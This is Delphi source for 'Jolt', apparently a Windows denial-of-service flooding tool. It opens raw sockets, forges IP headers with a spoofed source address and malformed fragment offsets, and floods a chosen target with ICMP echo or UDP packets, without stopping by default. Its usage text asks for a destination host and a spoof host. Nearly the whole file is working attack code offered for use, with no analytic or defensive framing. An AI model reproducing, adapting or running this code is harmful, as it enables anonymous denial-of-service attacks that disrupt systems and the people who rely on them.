unit MainUnit;

interface

uses
  SysUtils2, Winsock2, SocketHeaders;

type
  TAttackType = set of (TICMP, TUDP);
  TJoltOptions = packed record
    AttackType: TAttackType;
    Delay: Cardinal;
    HedefAdres: TSockAddrIn;
    Num: Cardinal;
    Port: Word;
    Sended: Cardinal;
    Socket: TSocket;
    Source: Cardinal;
  end;

var
  jo: TJoltOptions;

  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(host: PChar): Cardinal;
  procedure CreateSocket;
  procedure GetParams;
  procedure SetDefaultOptions;
  procedure JoltICMP;
  procedure JoltICMP_SetIPhdr(var IPhdr: PIPhdr);
  procedure JoltUDP;
  procedure JoltUDP_SetIPhdr(var IPhdr: PIPhdr);
  procedure JoltUDP_SetUDPhdr(var UDPhdr: PUDPhdr);
  procedure Usage(S: string);

implementation

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
begin
  WSASetLastError(0);
  Result:=Sendto(s, Buf, len, flags, addrto, tolen);
  //if WSAGetLastError <> 0 then Writeln('Unable to send icmp packet no: ' + InttoStr(jo.Sended));
  WSACancelBlockingCall;
  WSAUnhookBlockingHook;
end;

function Resolve(host: PChar): Cardinal;
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr:=inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then begin
    HostEnt:=GetHostByName(host);
    if not Assigned(HostEnt) then begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result:=InAddr.S_addr;
end;

procedure CreateSocket;
begin
  jo.Socket:=Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if jo.Socket = INVALID_SOCKET then begin
    Writeln('Unable to create socket');
    Halt(0);
  end;
  if SetSockopt(jo.Socket, IPPROTO_IP, IP_HDRINCL, '1', Sizeof(PInteger)) <> 0 then begin
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    CloseSocket(jo.Socket);
    Halt(0);
  end;
end;

procedure GetParams;
var
  i: integer;
  C: Char;
begin
  for i:=3 to ParamCount do begin
    C:=#0;
    if Length(ParamStr(i)) = 2 then
      if ParamStr(i)[1] = '-' then C:=ParamStr(i)[2];
    case C of
      'p' : begin
              jo.Port:=StrtoIntDef(ParamStr(i + 1), 7);
              if not (TUDP in jo.AttackType) then jo.AttackType:=jo.AttackType + [TUDP];
            end;
      'P' : begin
              if LowerCase(ParamStr(i + 1)) = 'icmp' then jo.AttackType:=[TICMP]
                else if LowerCase(ParamStr(i + 1)) = 'udp' then jo.AttackType:=[TUDP]
                  else if LowerCase(ParamStr(i + 1)) = 'both' then jo.AttackType:=[TICMP, TUDP]
                    else begin
                      Writeln('Protocol must be icmp, udp or both');
                      Halt(0);
                    end;
            end;
      'n' : jo.Num:=StrtoIntDef(ParamStr(i + 1), 0);
      'd' : jo.Delay:=StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure SetDefaultOptions;
begin
  jo.AttackType:=[TICMP];
  jo.HedefAdres.sin_addr.S_addr:=Resolve(PChar(ParamStr(1)));
  jo.HedefAdres.sin_family:=AF_INET;
  jo.HedefAdres.sin_port:=1235;
  jo.Delay:=0;
  jo.Num:=0;
  jo.Port:=7;
  jo.Sended:=0;
  jo.Source:=Resolve(PChar(ParamStr(2)));
end;

procedure Usage(S: string);
begin
  Write(
        'usage: ' + S + ' <dest host> <spoof host> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -P:   Protocols to use. Either icmp, udp or both  (default icmp)'#13#10 +
        '  -p:   Dest port                                   (default 7)'#13#10 +
        '  -n:   Num of packets to send                      (0 is continuous (default))'#13#10 +
        '  -d:   Delay (in ms)                               (default 0)'#13#10
       );
  Halt(0);
end;

procedure JoltICMP;
const
  PSize = 29;
var
  Buffer: PChar;
  IPhdr: PIPhdr;
  ICMPhdr: PICMPhdr;
begin
  Buffer:=AllocMem(PSize);
  IPhdr:=PIPhdr(Buffer);
  ICMPhdr:=PICMPhdr(Buffer + 20);
  JoltICMP_SetIPhdr(IPhdr);
  ICMPhdr.icmp_type:=8;
  Gonder(jo.Socket, Buffer^, PSize, 0, jo.HedefAdres, Sizeof(jo.HedefAdres));
  FreeMem(Buffer);
end;

procedure JoltICMP_SetIPhdr(var IPhdr: PIPhdr);
begin
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_len:=htons(28) + 40;
  IPhdr.ip_id:=htons($455);
  IPhdr.ip_off:=htons(8190);
  IPhdr.ip_ttl:=255;
  IPhdr.ip_p:=1;
  IPhdr.ip_src:=jo.Source;
  IPhdr.ip_dst:=jo.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum:=CheckSum(@IPhdr^, 20);
end;

procedure JoltUDP;
const
  PSize = 29;
var
  Buffer: PChar;
  IPhdr: PIPhdr;
  UDPhdr: PUDPhdr;
begin
  Buffer:=AllocMem(PSize);
  IPhdr:=PIPhdr(Buffer);
  UDPhdr:=PUDPhdr(Buffer + 20);
  JoltUDP_SetIPhdr(IPhdr);
  JoltUDP_SetUDPhdr(UDPhdr);
  Buffer[PSize - 1]:='a';
  Gonder(jo.Socket, Buffer^, PSize, 0, jo.HedefAdres, Sizeof(jo.HedefAdres));
  FreeMem(Buffer);
end;

procedure JoltUDP_SetIPhdr(var IPhdr: PIPhdr);
begin
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_len:=htons(28) + 40;
  IPhdr.ip_id:=htons($455);
  IPhdr.ip_off:=htons(8190);
  IPhdr.ip_ttl:=255;
  IPhdr.ip_p:=17;
  IPhdr.ip_src:=jo.Source;
  IPhdr.ip_dst:=jo.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum:=CheckSum(@IPhdr^, 20);
end;

procedure JoltUDP_SetUDPhdr(var UDPhdr: PUDPhdr);
begin
  UDPhdr.udp_sport:=htons(jo.Port or 1235);
  UDPhdr.udp_dport:=htons(jo.Port);
  UDPhdr.udp_ulen:=htons(9);
end;

end.
